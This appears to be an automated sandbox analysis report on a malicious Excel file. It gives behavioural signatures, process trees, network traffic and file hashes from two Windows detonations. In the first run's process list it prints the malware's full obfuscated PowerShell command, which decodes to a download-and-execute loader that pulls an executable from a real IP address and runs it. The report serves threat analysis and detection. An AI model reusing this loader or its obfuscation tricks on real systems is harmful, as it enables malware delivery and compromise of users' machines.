Analysis Overview
SHA256
aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf
Threat Level: Known bad
The file aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Evasion via Device Credential Deployment
Downloads MZ/PE file
Executes dropped EXE
Loads dropped DLL
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in System32 directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Uses Task Scheduler COM API
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 02:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 02:46
Reported
2024-11-13 02:48
Platform
win7-20240903-en
Max time kernel
139s
Max time network
140s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1976 set thread context of 2124 | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | C:\Windows\SysWOW64\svchost.exe |
| PID 2124 set thread context of 3048 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
| PID 2124 set thread context of 2360 | N/A | C:\Windows\SysWOW64\svchost.exe | C:\Windows\SysWOW64\mstsc.exe |
| PID 2360 set thread context of 3048 | N/A | C:\Windows\SysWOW64\mstsc.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mstsc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\wlanext.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\svchost.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mstsc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE
"C:\Windows\SysTEM32\wiNdoWSPoWeRSheLl\v1.0\POwersHeLl.ExE" "pOwErsHell -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt ; iex($(Iex('[sYStEM.tExt.EnCodINg]'+[ChaR]58+[CHAr]0X3a+'UTF8.getsTring([SYsTEm.CoNVErT]'+[ChAr]0x3a+[CHAR]58+'FroMBASe64strINg('+[ChaR]0X22+'JEMzV3NmSEMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVyZEVGSU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ByeSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJcWloU2dPcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3l3UmhuUUdmS1IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2JKYUdNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiV25XVCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQzNXc2ZIQzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzMuNC42MS8zNDUvd2xhbmV4dHMuZXhlIiwiJEVOdjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3NUQVJULXNsZUVwKDMpO3NUYXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3bGFuZXh0LmV4ZSI='+[chaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -NoP -w 1 -C DEVicecREdEnTiAlDEplOYMeNt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp"
C:\Users\Admin\AppData\Roaming\wlanext.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Roaming\wlanext.exe"
C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.18:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.sodatool.site | udp |
| CN | 122.152.214.209:80 | www.sodatool.site | tcp |
| US | 8.8.8.8:53 | www.wwwzbk.app | udp |
| HK | 202.95.12.144:80 | www.wwwzbk.app | tcp |
| US | 8.8.8.8:53 | www.sqlite.org | udp |
| US | 45.33.6.223:80 | www.sqlite.org | tcp |
Files
memory/3048-1-0x000000007259D000-0x00000000725A8000-memory.dmp
memory/3048-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/3048-17-0x0000000002D30000-0x0000000002D32000-memory.dmp
memory/2732-16-0x0000000002100000-0x0000000002102000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1
| MD5 | fca2d4075e78fd8330d5590ee560451b |
| SHA1 | b7ab976b0f45facd4a29a6aded52515523cd756b |
| SHA256 | 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689 |
| SHA512 | f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
| MD5 | 278f2c9dc15ca7c48785ffb7a522f3b6 |
| SHA1 | 826e17b66ae225807c37f1534623ee2120cf3666 |
| SHA256 | 67a45783638fa4692d0d52305b3e2d4dd64dfddce09b049d64c8942b9a561661 |
| SHA512 | 4c3f6e4f8d0c788b608fc73163c669e2b894ea9068fc01ba21187eeb924f2d203280250b5ca55d665c9e44a3806d952e3b375e7414a747423b40c484e5234ecb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | 8cea8ad0055cfa7e2996bb974d07439d |
| SHA1 | 0f79068cf7f28aa67c12849457f6b73eb319125a |
| SHA256 | 975a4049d9052d356d7e8b98a12d146bb9f006e76df36ba7dbe4d265078e191a |
| SHA512 | 68dbc1e3cad1c472490000cbe5c9f0f5fb053ca0ed50fad15fc91144c5f4cddc2b8bf0df1db4802d13f45be366065de08b26784e3ff32bb1a5980be4db34f87a |
C:\Users\Admin\AppData\Local\Temp\CabB210.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\seethebestthingswithgreatthingsbestthingswithgreatentry[1].hta
| MD5 | 03ebca3f0b4171e32b0689a3410e79ad |
| SHA1 | 1e7b517e45f1b0e503e796bb6dcc7a6252f35364 |
| SHA256 | 1d3307d98ef8b5e0743dc753388a3b8698a52783338bf8fe49042ad62ad98732 |
| SHA512 | a7b84ce6572f3e820cffe438c771b5c3bdd140fca78edb7d6a7217bb7bf57950168d025f5c6e634e482a4a99576367ada72e3d9e26891ab03901136f9ed74270 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | c25ae41143a3dc8db0136cd00b75e178 |
| SHA1 | c0c8d88e62eb1b3e759677512ed50a320df32479 |
| SHA256 | 73d82479177fd2cf7b7c493b7120035eeb3f17e3eba5973ee427194cd201c754 |
| SHA512 | 3d5e96b136faaab56f24f9fc216f30d418915169600e9a90ab934804f2f2ff8939e490f3098be3141fcde8b0ff151c6179c9ce7160b57f8e1c77e9b32d2ec8fe |
\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.cmdline
| MD5 | cb25a753d2162468e70eb450ff86d8ed |
| SHA1 | 994be0e177cc763e04068fffea58d20e30dd327f |
| SHA256 | 52dafc3b411fc1f3f717745ef1c76029cae193d7fb6777f4c67cef223824fdd2 |
| SHA512 | b396add7928624ee470ed5fd66197222a0192a732054bdac5b0690587e2272e209e3ee91c57b26649527b158940c4538d63c494d7a2457f8bf1508fc9d0216cb |
\??\c:\Users\Admin\AppData\Local\Temp\tnpx6mte.0.cs
| MD5 | 4af98cbe7b888e1e92e1aa8a35732223 |
| SHA1 | 75d54c91355c97fc9b1c3453efea5dccd817ed42 |
| SHA256 | 596b94a3cb934e9261ddf50733d26c0147c5cb57e1215cabed32fee719782f34 |
| SHA512 | 1127001fd6eb53db939188df14cdd466f44103d8386e51ffaeaaa56569e137367388097c37422fbe332f6b7ced9f4959058f1235f106efcc03e492e009705ff3 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCC16B.tmp
| MD5 | 5c851f4b3a74dc8112c0363e7a4c058b |
| SHA1 | 9efc91ddaf92b054bc744fce8fa49abb8487d06e |
| SHA256 | c1f74a6fbb7152496a27ecb896ecc310c624f4672024766f3b7b6bac32957fab |
| SHA512 | c5f9f6313edf4ef0055a0dd39191a0a70c4f9f51f2b6a7667a4a30e759d65f31a8817492ee53863e93f9750386db9cc399fefc55e5a2a53be15cdd0691cf2e4d |
C:\Users\Admin\AppData\Local\Temp\RESC16C.tmp
| MD5 | ceff02079ffeba9fe9071e2a8dc5c60b |
| SHA1 | 8ef32fde3068d74ff260594f4e81a9e722dd9c8a |
| SHA256 | f2701121bba43e22f733ad8d9c0bc503b547f21fc95d352ca10d0819f7a32d0d |
| SHA512 | 8e0bcc1700b9ba4ec01d04baed103bb8c5a573b3aa2382eb4ef3ce0b194312314971542ec7399fe2a767da070ac0e3d8002f11c6bda0d3b7724c5d8823ee4f74 |
C:\Users\Admin\AppData\Local\Temp\tnpx6mte.dll
| MD5 | 1a216f7b4404a7e76e9224ad3f4d0579 |
| SHA1 | 97954f49e9a8c8b54c1542a8f916972443e5b389 |
| SHA256 | e257a1620aa98b569bcdb75cedbf2552f3d0a3e49df71007dc2a64526d15bb02 |
| SHA512 | 45c7dc8ebd845f46931019b378a8a8333238adf77e73ad3c71be4843a11b6cdad56718d31adb08b6e1ac52f46966ab15c4664f281978238812a8a35fc3ff40a4 |
C:\Users\Admin\AppData\Local\Temp\tnpx6mte.pdb
| MD5 | 7b95801062f5d47de9cc5e59dcc10462 |
| SHA1 | 6d7e58750a67f796d6441a84538f32b0d481a95e |
| SHA256 | 1108177b5dac0f3dbb5fef753d33ff281e4a8015184b8962005c2f67eb12f009 |
| SHA512 | e6253dfef719f52fc44e88d2c26bccd168d1bc7aef5266cd7a39b9ccf67df83c7483f53b066fe1cf1715f4af70c9e51f9b3d76ed5b451854e891a02cf587375d |
memory/3048-56-0x000000007259D000-0x00000000725A8000-memory.dmp
C:\Users\Admin\AppData\Roaming\wlanext.exe
| MD5 | 7423e3013a2ca93513e9f1024dfe1cc8 |
| SHA1 | 525281537f75c168ca4015df438bb83a7784931a |
| SHA256 | 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df |
| SHA512 | d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0 |
C:\Users\Admin\AppData\Local\Temp\juvenilely
| MD5 | 5fc0e7bec89d9a4e021d88dd1cf731b2 |
| SHA1 | 26ea02938cb1eb51a1ac601ab1b068a130cc3719 |
| SHA256 | 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d |
| SHA512 | 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f |
memory/2124-79-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2360-80-0x0000000000080000-0x00000000000C4000-memory.dmp
memory/2360-81-0x0000000000080000-0x00000000000C4000-memory.dmp
memory/3048-82-0x0000000007550000-0x0000000007679000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\lxzluzp.zip
| MD5 | 3bcbd3b08e4a8843fda34512623960a2 |
| SHA1 | 244d3df69bbc09a43d4af3de5165f50506b8d7af |
| SHA256 | 7db638aa6b205aadba193dc7803a7e73eb07bbeeacbacad3a65978093e78673c |
| SHA512 | 914f366aab61ed2c13a87ee07e6a4b7aeffe4689c28014fab786244127852a19b7c1ae58bd8dd11840415035290373922f39b628c2409f68569cbf0b8a57e639 |
\Users\Admin\AppData\Local\Temp\sqlite3.dll
| MD5 | dda1b03a5cd2ca37c96b7daf5e3a8ed7 |
| SHA1 | c70e5f58e61980d39608f0795879bf012dbbbca2 |
| SHA256 | 79f86c1edbbc69652a03a0f5667b3985bcf1e19f16fa3b8c7934e5b97ab8586d |
| SHA512 | bf83648c9b5d6d65b2c8409d262a1b7421d2cb13d6c759ec5f352c2d1c5adff3ee2395250fbdfe3590f25fe96bf6b40c2d82a8e7eecaab03be2e6a398e83981f |
memory/2360-119-0x0000000000080000-0x00000000000C4000-memory.dmp
memory/2360-120-0x0000000061E00000-0x0000000061ED2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 02:46
Reported
2024-11-13 02:48
Platform
win10v2004-20241007-en
Max time kernel
144s
Max time network
137s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 856 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
| PID 3092 wrote to memory of 856 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aa4a4d125c444cbe602ab60cba31083a31fd60e2c2ce08e55f84468751a82daf.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.210.23.2.in-addr.arpa | udp |
| US | 107.173.4.61:80 | 107.173.4.61 | tcp |
| US | 8.8.8.8:53 | 61.4.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3092-1-0x00007FFDDADED000-0x00007FFDDADEE000-memory.dmp
memory/3092-3-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-2-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-0-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-4-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-5-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-7-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-6-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-8-0x00007FFD9ADD0000-0x00007FFD9ADE0000-memory.dmp
memory/3092-9-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-10-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp
memory/3092-11-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-12-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
memory/3092-13-0x00007FFD98C50000-0x00007FFD98C60000-memory.dmp
memory/3092-18-0x00007FFDDAD50000-0x00007FFDDAF45000-memory.dmp
